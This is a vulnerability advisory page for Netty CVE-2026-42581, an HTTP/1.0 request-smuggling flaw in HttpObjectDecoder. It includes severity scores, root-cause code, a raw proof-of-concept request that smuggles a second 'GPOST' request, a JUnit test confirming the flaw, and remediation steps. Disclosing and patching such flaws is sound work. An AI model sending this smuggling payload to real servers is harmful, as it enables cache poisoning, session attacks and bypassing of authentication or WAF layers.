Skip to main content

Netty CVE-2026-42581

CRITICAL
HTTP Request/Response Smuggling (CWE-444)
2026-05-07 https://github.com/netty/netty GHSA-xxqh-mfjm-7mv9
Critical
Disputed · 9.8 NVD
Share

Severity by source

Sources disagree (Medium–Critical)
NVD PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.7 HIGH

AC:H because exploitation needs a CL-first downstream proxy and an HTTP/1.0 path; PR:N/UI:N unauthenticated; S:C as desync impacts other users/components; A:N since no direct availability loss.

3.1 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
4.0 AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N
SUSE
5.8 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Red Hat
7.2 HIGH
qualitative

vuln.today treats the vendor’s rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

8
Analysis Updated
Jun 30, 2026 - 03:38 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 03:35 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 30, 2026 - 03:24 vuln.today
cvss_changed
Severity Changed
Jun 30, 2026 - 03:24 NVD
MEDIUM CRITICAL
CVSS changed
Jun 30, 2026 - 03:24 NVD
5.8 (MEDIUM) 9.8 (CRITICAL)
Source Code Evidence Fetched
May 07, 2026 - 00:45 vuln.today
Analysis Generated
May 07, 2026 - 00:45 vuln.today
CVE Published
May 07, 2026 - 00:18 nvd
MEDIUM 5.8

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 11 maven packages depend on io.netty:netty-codec-http (11 direct, 0 indirect)

Ecosystem-wide dependent count for version 4.2.0.Alpha1.

DescriptionNVD

NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization

FieldValue
Libraryio.netty:netty-codec-http
Componentcodec-http - HttpObjectDecoder
SeverityHIGH
AffectsHEAD, commit 4f3533ae confirmed

---

Summary

HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling.

---

Root Cause

java
// HttpObjectDecoder.java:828-833
if (HttpUtil.isTransferEncodingChunked(message)) {
    this.chunked = true;
    if (!contentLengthFields.isEmpty() && message.protocolVersion() == HttpVersion.HTTP_1_1) {
        handleTransferEncodingChunkedWithContentLength(message);  // strips CL - HTTP/1.1 only
    }
    return State.READ_CHUNK_SIZE;
}

// HttpObjectDecoder.java:870-873
protected void handleTransferEncodingChunkedWithContentLength(HttpMessage message) {
    message.headers().remove(HttpHeaderNames.CONTENT_LENGTH);
    contentLength = Long.MIN_VALUE;
}

The conflict-resolution path is gated on message.protocolVersion() == HttpVersion.HTTP_1_1. When the request declares HTTP/1.0, the condition is false, handleTransferEncodingChunkedWithContentLength is never called, and the Content-Length header survives into the forwarded message. Netty still processes the body as chunked; a downstream component that is CL-first interprets the same bytes as a separate request.

---

Proof of Concept

POST /api HTTP/1.0\r\n
Host: internal.example.com\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 0\r\n
\r\n
5\r\n
GPOST\r\n
0\r\n
\r\n

Netty consumes the full chunked body (5 bytes + terminator). A downstream CL-first proxy reads Content-Length: 0, considers the request complete at the blank line, and treats 5\r\nGPOST\r\n0\r\n\r\n as the start of a second request.

---

Conditions Required

  1. Netty is deployed behind a reverse proxy or load balancer that is Content-Length-first (nginx, some HAProxy configs, AWS ALB in certain modes).
  2. Attacker can send HTTP/1.0 requests (either directly or by downgrading via connection manipulation).
  3. No additional HTTP/1.0 stripping layer between attacker and Netty.

---

Impact

Request smuggling at the Netty edge. Allows cache poisoning, session fixation against other users, unauthorized access to internal endpoints, and bypassing of WAF or authentication layers that inspect only the first logical request.

---

Confirmed PoC Test

Verified against HEAD (4f3533ae) using EmbeddedChannel. Both tests pass, confirming the vulnerability and the HTTP/1.1 contrast.

java
package io.netty.handler.codec.http;

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.util.CharsetUtil;
import org.junit.jupiter.api.Test;

import static org.junit.jupiter.api.Assertions.*;

public class NettySmugglingSec001Test {

    // VULNERABLE: Content-Length survives in HTTP/1.0 TE+CL conflict
    @Test
    public void http10_contentLengthNotStripped() {
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());
        ch.writeInbound(Unpooled.copiedBuffer(
                "POST /api HTTP/1.0\r\n" +
                "Transfer-Encoding: chunked\r\n" +
                "Content-Length: 0\r\n" +
                "\r\n" +
                "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII));

        HttpRequest req = ch.readInbound();
        assertEquals(HttpVersion.HTTP_1_0, req.protocolVersion());
        // Content-Length: 0 survives - downstream CL-first proxy treats chunked body as new request
        assertNotNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), "VULNERABLE: CL not stripped");
        ch.finishAndReleaseAll();
    }

    // SAFE: HTTP/1.1 correctly strips Content-Length on TE+CL conflict
    @Test
    public void http11_contentLengthStripped() {
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());
        ch.writeInbound(Unpooled.copiedBuffer(
                "POST /api HTTP/1.1\r\n" +
                "Transfer-Encoding: chunked\r\n" +
                "Content-Length: 0\r\n" +
                "\r\n" +
                "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII));

        HttpRequest req = ch.readInbound();
        assertNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH), "SAFE: CL correctly stripped");
        ch.finishAndReleaseAll();
    }
}

---

Fix Guidance

Remove the message.protocolVersion() == HttpVersion.HTTP_1_1 guard in HttpObjectDecoder, applying handleTransferEncodingChunkedWithContentLength unconditionally whenever both Transfer-Encoding: chunked and Content-Length are present, regardless of protocol version.

AnalysisAI

HTTP request smuggling in Netty's netty-codec-http (HttpObjectDecoder) lets remote attackers desynchronize message boundaries by sending an HTTP/1.0 request carrying both Transfer-Encoding: chunked and Content-Length. Netty's anti-smuggling sanitization that strips the conflicting Content-Length header only runs for HTTP/1.1, so on HTTP/1.0 Netty parses the body as chunked while leaving Content-Length intact for any downstream Content-Length-first proxy, which then treats trailing chunk bytes as a new request. Publicly available exploit code exists (a working EmbeddedChannel PoC test), but EPSS is very low (0.03%, 8th percentile) and it is not in CISA KEV.

Technical ContextAI

The affected component is io.netty:netty-codec-http, the HTTP/1.x codec used by the Netty asynchronous networking framework that underpins many Java servers, proxies, and frameworks (e.g. gRPC, Spring WebFlux/Reactor Netty, Elasticsearch transports). The root cause is CWE-444 (Inconsistent Interpretation of HTTP Requests / 'HTTP Request Smuggling'). In HttpObjectDecoder.java (~lines 828-833), when a message declares Transfer-Encoding: chunked, the decoder only invokes handleTransferEncodingChunkedWithContentLength() - which removes the conflicting Content-Length header - if message.protocolVersion() == HttpVersion.HTTP_1_1. For an HTTP/1.0 message the guard is false, the Content-Length header survives into the forwarded HttpMessage even though the body is consumed as chunked. The CPE/package data confirms the affected artifact is pkg:maven/io.netty:netty-codec-http across the 4.1.x and 4.2.x lines.

RemediationAI

Upgrade netty-codec-http to a fixed release: 4.2.13.Final for the 4.2.x line or 4.1.133.Final for the 4.1.x line (Vendor-released patch). Resolve transitive copies bundled by frameworks (Reactor Netty, gRPC, Elasticsearch, etc.) by overriding the managed Netty version, not just direct dependencies. Apply your platform's packaged fix where applicable (Ubuntu USN-8401-1, Red Hat RHSA-2026:23808/24502/25123/28010). The upstream fix removes the HttpVersion.HTTP_1_1 guard so Content-Length is stripped whenever Transfer-Encoding: chunked and Content-Length coexist. Where immediate patching is not possible, the most effective compensating control is to reject or normalize HTTP/1.0 requests that contain both Transfer-Encoding and Content-Length at the front-end proxy, or strip Transfer-Encoding/Content-Length conflicts before they reach Netty (side effect: legitimate but malformed clients are dropped); alternatively, terminate and re-emit requests as HTTP/1.1 at an intermediary so the conflicting Content-Length is sanitized (side effect: adds a proxy hop and HTTP/1.0 clients lose connection-specific behavior). Confirm whether your front-end proxy is Content-Length-first; making it Transfer-Encoding-first or having it reject conflicting requests closes the desync. See GHSA-xxqh-mfjm-7mv9 for vendor guidance.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
openSUSE Tumbleweed Fixed
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS Affected

Share

CVE-2026-42581 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy